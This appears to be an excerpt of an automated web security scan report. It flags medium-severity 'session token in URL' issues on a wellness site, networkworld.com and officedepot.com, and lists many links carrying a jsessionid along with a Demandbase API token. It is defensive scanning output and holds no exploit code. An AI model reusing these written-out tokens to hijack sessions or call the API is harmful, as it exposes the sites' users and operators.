<a href="/tag/visualization.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">visualization (43)</a><br/>

<a href="/tag/weekly-roundup.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">weekly roundup (44)</a><br/>

<a href="/tag/weight-loss-success.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">weight loss success (113)</a><br/>

<a href="/tag/wellness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">wellness (210)</a><br/>

<a href="/tag/words-of-wisdom.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">words of wisdom (134)</a><br/>

<a href="/tag/yoga.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga (306)</a><br/>

<a href="/tag/yoga-poses.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses (93)</a><br/>

<a href="/tag/yoga-poses-moving.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses moving (5)</a><br/>

<a href="/tag/yoga-poses-sequence.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses sequence (2)</a><br/>

<a href="/tag/yoga-poses-video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses video (18)</a><br/>

<a href="/tag/yogis.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yogis (47)</a>
...[SNIP]...
<a href="http://ny.mindbodygreen.com"><img src="/images/ny-banner-300x250.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
...[SNIP]...
<div class="image"><a href="/0-1446/The-Power-The-Secret-Sequel-24-Inspirational-Quotes-from-Rhonda-Byrnes-New-Book.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/the-power-rhonda-byrne-the-secret-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1446/The-Power-The-Secret-Sequel-24-Inspirational-Quotes-from-Rhonda-Byrnes-New-Book.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">'The Power' ('The Secret' Sequel): 24 Inspirational Quotes</a>
...[SNIP]...
<div class="image"><a href="/0-1530/Q-A-with-Seane-Corn-On-Yoga-Giving-Back.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/seane-corn-art-shot-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1530/Q-A-with-Seane-Corn-On-Yoga-Giving-Back.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Q & A with Seane Corn: On Yoga & Giving Back</a>
...[SNIP]...
<div class="image"><a href="/0-1500/Men-and-Yoga-What-Inspired-Yogis-to-Hit-the-Mat.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/Vinnie-THUMB.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1500/Men-and-Yoga-What-Inspired-Yogis-to-Hit-the-Mat.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Men and Yoga: What Inspired Yogis to Hit the Mat</a>
...[SNIP]...
<div class="image"><a href="/0-91/The-7-Chakras-for-Beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/7-chakras-beginners.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-91/The-7-Chakras-for-Beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">The 7 Chakras for Beginners</a>
...[SNIP]...
<div class="image"><a href="/0-1683/6-Ways-to-Detox-Through-Your-Skin.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/Jess-Ainscough-wellness-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1683/6-Ways-to-Detox-Through-Your-Skin.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">6 Ways to Detox Through Your Skin</a>
...[SNIP]...
<div class="image"><a href="/0-1792/8-Steps-to-Finding-Your-Middle-Path-for-the-New-Year-Extremes-Begone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/McLeanMcGown_thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1792/8-Steps-to-Finding-Your-Middle-Path-for-the-New-Year-Extremes-Begone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">8 Steps to Finding Your Middle Path: Extremes Begone!</a>
...[SNIP]...
<div class="image"><a href="/0-1024/Q-A-with-Kris-Carr-Crazy-Sexy-Inspirational-Wellness-Rock-Star.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/KrisCarr1-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1024/Q-A-with-Kris-Carr-Crazy-Sexy-Inspirational-Wellness-Rock-Star.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Q & A with Kris Carr: Crazy Sexy Wellness</a>
...[SNIP]...
<div class="image"><a href="/0-1115/The-3-Ps-of-Optimism.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/brian-johnson-wellness-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1115/The-3-Ps-of-Optimism.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">The 3 P's of Optimism</a>
...[SNIP]...
<div class="image"><a href="/0-947/Yoga-Poses-for-the-Core-Howto-Tips-Benefits-Images-Videos.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/yoga-poses-core-preview-9-ways-lose-weight-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-947/Yoga-Poses-for-the-Core-Howto-Tips-Benefits-Images-Videos.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Yoga Poses for Your Core</a>
...[SNIP]...
<div class="image"><a href="/0-1452/Barre3-Review-Better-Workout-for-Better-Posture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/barre-3-review-preview.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1452/Barre3-Review-Better-Workout-for-Better-Posture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Barre3 Review: Better Workout for Better Posture</a>
...[SNIP]...
<div class="image"><a href="/0-1835/Breathe-Your-Way-to-an-Open-Heart.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/heart-chakra.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1835/Breathe-Your-Way-to-an-Open-Heart.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Breathe Your Way to an Open Heart</a>
...[SNIP]...
<div class="image"><a href="/0-787/Q-A-with-Melissa-Etheridge-On-Yoga-Books-More.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/preface-banner_melissa_preview.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-787/Q-A-with-Melissa-Etheridge-On-Yoga-Books-More.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Q & A with Melissa Etheridge: Yoga, Books & More</a>
...[SNIP]...
<div id="footer">

<a href="/;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Home</a> | <a href="/about.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">About</a> | <a href="/contactus.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Contact</a> | <a href="/contactus.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0?t=help" class="footer2">Help</a>
...[SNIP]...
</p>
<a href="/termsofuse.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Terms
of Use</a> | <a href="/privacy.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Privacy
Policy</a> | <a href="/disclaimer.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Disclaimer</a>
...[SNIP]...

9.82. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse

Request

Response

9.83. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse

Request

Response

9.84. http://www.officedepot.com/promo.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.officedepot.com
Path:	/promo.do

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.officedepot.com/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/all-in-ones/N=5+509834/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/audio-and-video-electronics/N=5+509401/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/av-supplies-and-equipment/N=5+1677/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/binder-accessories/N=5+2156/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/binders/N=5+2177/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/business-and-desk/N=5+4800/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/business-cards/N=5+2949/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/business-cases/N=5+2674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/business-forms-tax-forms-and-recordkeeping/N=5+4094/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/calculators/N=5+509745/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/calendars-and-planners/N=5+2776/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/cameras-and-camcorders/N=5+509515/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/chair-and-floor-mats/N=5+501493/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/christopher-lowell-furniture-collections/N=5+501589/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/cleaners-and-disinfectants/N=5+2363/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/clips-pushpins-fasteners-and-rubber-bands/N=5+1935/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/commercial-grade-desks/N=5+501546/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/computer-carts/N=5+501479/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/computer-parts-and-upgrades/N=5+509589/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/copy-and-multipurpose-paper-white/N=5+487272/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/custom-drinkware/N=5+4970/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/custom-pens-and-pencils/N=5+5276/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/decor-and-accessories/N=5+501525/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/desk-and-wall-accessories/N=5+3347/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/desk-and-wall-accessories/N=5+504392/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/desktop-computers/N=5+509615/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/envelopes/N=5+4177/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/executive-gifts/N=5+3415/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/external-hard-drives/N=5+509636/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/file-folders/N=5+3545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/folding-and-stacking-chairs/N=5+501504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/food-and-beverage/N=5+2546/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/foray/N=5&cbxRefine=302020/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/hanging-file-folders/N=5+3628/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/indexes-tabs-and-dividers/N=5+2228/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/ink-toner-and-ribbons/N=5+509666/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/ink-toner-and-ribbons/N=5+513380/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/inkjet-printers/N=5+509855/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/interactive-whiteboards/N=5+513187/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/internal-hard-drives/N=5+509641/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/keyboards-and-mice/N=5+509558/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/label-makers-and-tapes/N=5+509760/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/labels-and-label-makers/N=5+3806/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/laminating-machines/N=5+509765/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/laptop-accessories/N=5+509569/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/laptops/N=5+509617/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/laser-printers/N=5+509857/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/lateral-file-cabinets/N=5+501573/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/lighting/N=5+501877/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/mailroom-supplies/N=5+3912/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/markers-and-highlighters/N=5+4467/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/media/N=5+509644/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/message-pads-and-memo-books/N=5+2004/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/metal-bookcases/N=5+483117/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/modular-furniture-collections/N=5+501802/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/monitor-accessories/N=5+509672/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/monitors/N=5+509676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/network-services/N=5+509887/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/networking-and-cables/N=5+509688/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/office-chairs/N=5+501507/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/office-depot-brand-products/N=5+422825/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/office-supplies/N=5+1676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/panel-and-cubicle-systems/N=5+501895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/paper-products-and-dispensers/N=5+2602/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/pencils/N=5+4504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/pens/N=5+4520/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/phones-and-accessories/N=5+509793/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/portable-flash-drives/N=5+509664/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/power-protection-and-batteries/N=5+509475/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/powersurge-protectors/N=5+509579/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/projectors/N=5+509684/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/property-damage-solutions/N=5+319645/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/reception-seating/N=5+501516/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/repair-upgrade-services/N=5+509889/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/safes/N=5+501903/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/school-supplies/N=5+502600/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/self-stick-notes-and-flags/N=5+6188/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/servers/N=5+510989/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/shredders/N=5+509777/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/small-officehome-office-desks/N=5+501556/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/software-and-books/N=5+509895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/solutions-for-prevention-of-online-threats/N=5+510451/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/specialty-desking/N=5+501568/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/specialty-filesstorage/N=5+501578/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/stamps-and-daters/N=5+3034/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/staplers-staples-and-removers/N=5+2113/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/stationery/N=5+2930+378259/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/storage--files-boxes-and-more/N=5+3733/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/tables/N=5+501910/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/tablet-pcs/N=5+509621/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/tape-and-adhesives/N=5+371557/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/teacher-and-classroom-supplies/N=5+502674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/technology/N=5+9021/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/tv-carts-and-stands/N=5+501488/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/utility-and-book-carts/N=5+501491/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/vertical-file-cabinets/N=5+501584/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/wall-units/N=5+501439/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/warranties-and-services/N=5+509880/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/webcams/N=5+509587/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/wide-format-printers/N=5+509875/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/wood-bookcases/N=5+483123/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/wood-veneer-furniture-collections/N=5+501822/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/browse/your-greener-office/N=5+11332/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/catalog-request/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/ink-toner-and-ribbons/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/promo/pages/0711_mobile/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/site-map/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/a/top-categories/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/account/alertsDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/account/myAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10206&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10207&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=12157&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15028&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15030&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15031&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15032&redirect=false
http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15033&redirect=false
